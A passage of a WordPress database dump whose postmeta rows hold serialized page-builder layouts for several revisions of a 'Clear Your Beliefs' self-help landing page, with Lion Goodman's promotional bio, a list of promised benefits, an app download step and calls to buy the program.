power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(995, 1505, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:634:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(996, 1506, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:634:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(997, 1508, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:661:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p>\n<p style="text-align: center;"> Clear Limiting and<br />Negative Beliefs<br />Permanently. <br />Eliminate Beliefs that Block<br />Abundance, Love,<br />Relationships, and<br />Manifesting What You Want</p>\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your 